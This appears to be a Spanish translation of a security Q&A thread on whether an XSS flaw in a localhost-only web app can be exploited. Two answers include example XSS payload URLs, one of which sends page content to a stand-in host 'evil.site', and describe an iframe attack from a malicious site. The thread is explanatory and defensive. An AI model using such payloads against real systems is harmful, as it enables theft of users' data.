Riesgo XSS para una aplicación a la que solo se puede acceder desde localhost

5

Tengo una aplicación web que se puede utilizar a través de un navegador. Se puede acceder a la aplicación web solo en localhost. No es posible el acceso remoto. Una herramienta de seguridad descubrió un problema de XSS. Ahora, si esta aplicación web funciona solo en localhost, ¿cómo se puede explotar este problema de XSS? Supongo que solo un usuario local puede explotar este problema.

    
pregunta nachi 22.01.2013 - 11:22
fuente

3 respuestas

8

Sí, es un problema.

El objetivo principal de un XSS es enviar a un usuario a una URL diseñada que explota el error en el navegador de ese usuario. Si un atacante sabe que existe un XSS, podría crear una URL XSS y enviarla a un usuario objetivo, y ese usuario podría acceder al dominio localhost.

Por ejemplo, digamos que hay una página llamada /viewitem que toma un parámetro name , que es vulnerable a XSS:

http://localhost/viewitem?id=123&name=n<script>alert(document.cookie);</script>

Te envía ese enlace. Hace clic en él y, de repente, aparece un cuadro de alerta que contiene las cookies de la página. En realidad, publicaría el valor de las cookies en un sitio de terceros, ¡y ha robado tus cookies! En este caso, en realidad no puede acceder al sitio, por lo que es un punto discutible.

Sin embargo, dependiendo de la configuración del sitio, es posible que también pueda filtrar los datos de la página viewitem . Por ejemplo:

http://localhost/viewitem?id=123&name=n<script>var ver=document.getElementById('version').innerHTML;document.location.href='http://evil.site/steal?ver='+encodeURIComponent(ver);</script>

Si tienes un elemento con el id version , la URL anterior extraerá su contenido y lo enviará a una página de terceros, informando así al atacante de la versión de tu software. Este truco podría extenderse para robar otra información privada en la página, o usar Ajax para obtener otro contenido del dominio localhost .

    
respondido por el Polynomial 22.01.2013 - 11:35
fuente
7

Es un problema y aquí hay un escenario de ataque:

  • La aplicación web vulnerable Vuln_app reside en Vuln_machine
  • Vuln_app es accesible solo desde localhost
  • Un usuario que navega por la web desde Vuln_machine navega hasta el sitio web Attack_site
  • Attack_site contiene una página web con un iframe que apunta al Vuln_app en localhost: <iframe src="http://127.0.0.1/Vuln_app/<xss_issue>"/>
  • Attack_site ahora puede ejecutar JavaScript en el contexto de Vuln_app
respondido por el Cristian Dobre 22.01.2013 - 11:38
fuente
1

Sí. Si usted es la única persona que va a usar esta aplicación, entonces también debe preocuparse por XSS debido a xss reflexivo. Pero si esta aplicación va a ser utilizada por los compañeros de trabajo, este será un problema grave. Especialmente si eres parte de una organización y hay personas que pueden acceder a tu aplicación, entonces pueden hacer uso de esta vulnerabilidad para dañar tu servidor y estropear tu aplicación web. Si su aplicación está alojada a largo plazo, este problema debería solucionarse.

    
respondido por el sujeesh 22.01.2013 - 12:11
fuente

Lea otras preguntas en las etiquetas